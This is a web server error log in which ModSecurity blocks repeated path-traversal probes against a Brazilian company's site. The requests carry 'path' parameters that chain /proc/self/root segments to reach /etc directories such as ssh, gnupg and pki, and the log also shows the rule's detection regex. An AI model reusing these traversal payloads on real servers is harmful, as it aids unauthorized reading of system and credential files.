[Tue Mar 17 18:26:03.923980 2026] [:error] [pid 29151:tid 140411616036608] [client 74.7.241.31:47288] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnG6_PqhzTj3BvfDX-gPQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:26:09.793384 2026] [:error] [pid 2473:tid 140411574073088] [client 74.7.241.31:55886] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnG8aBJNF7axNlVR0UxPQAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 18:26:11.499031 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:53602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnG89Y0UrI5A3LftIwWqQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 18:26:21.126645 2026] [proxy_fcgi:error] [pid 2473:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:57782] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:26:24.617435 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.243.128:44236] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHANa6ubjKNq_cu4YglAAAA0A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:26:25.331614 2026] [:error] [pid 29151:tid 140411548894976] [client 74.7.241.31:53608] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHAfPqhzTj3BvfDX-gSAAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:26:43.125872 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58160] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:26:44.448265 2026] [:error] [pid 6296:tid 140411599251200] [client 74.7.241.31:60384] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHFHIk7brgkOH-rIWl7QAAAVE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 18:26:50.626089 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.241.31:33570] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHGhj0p0SRWAqcjGGTBQAAAxM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:26:51.304696 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.243.128:45976] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHGxj0p0SRWAqcjGGTCAAAAwE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/run/initramfs/state/etc
[Tue Mar 17 18:27:05.145842 2026] [proxy_fcgi:error] [pid 2598:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:58536] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:27:27.124501 2026] [proxy_fcgi:error] [pid 7004:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:59026] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:27:38.126078 2026] [:error] [pid 7437:tid 140411716749056] [client 74.7.241.31:34342] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHSgeiSKl8TjouI-YwqgAAA8M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:39.810566 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:57642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHS-yqAr6etmhZHNpAygAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:40.021303 2026] [:error] [pid 31803:tid 140411741927168] [client 74.7.241.31:57642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHTOyqAr6etmhZHNpAywAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:41.292467 2026] [:error] [pid 2598:tid 140411574073088] [client 74.7.241.31:57654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHTRj0p0SRWAqcjGGTHwAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:42.695574 2026] [:error] [pid 25836:tid 140411590858496] [client 74.7.241.31:57668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHToh-PF_25v4hFRCDegAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:50.121995 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:59480] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 18:27:51.421504 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.31:43304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHV9Y0UrI5A3LftIwW3wAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:52.891087 2026] [:error] [pid 7004:tid 140411540502272] [client 74.7.241.31:43308] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHWMU6Sx0TG1YjmQjHVQAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:54.369440 2026] [:error] [pid 25836:tid 140411641214720] [client 74.7.241.31:43312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHWoh-PF_25v4hFRCDfQAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:54.604159 2026] [:error] [pid 25836:tid 140411691570944] [client 74.7.241.31:43312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHWoh-PF_25v4hFRCDfgAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:55.346729 2026] [:error] [pid 25836:tid 140411658000128] [client 74.7.241.31:43312] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHW4h-PF_25v4hFRCDfwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:27:59.310230 2026] [:error] [pid 7437:tid 140411548894976] [client 74.7.241.31:43326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHXweiSKl8TjouI-YwtAAAA9c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:00.946594 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.31:51558] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHYKBJNF7axNlVR0UxiQAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:02.495105 2026] [:error] [pid 6296:tid 140411607643904] [client 74.7.241.31:51574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abnHYnIk7brgkOH-rIWmEwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 18:28:12.149934 2026] [proxy_fcgi:error] [pid 7004:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59900] AH01075: Error dispatching request to : (polling)
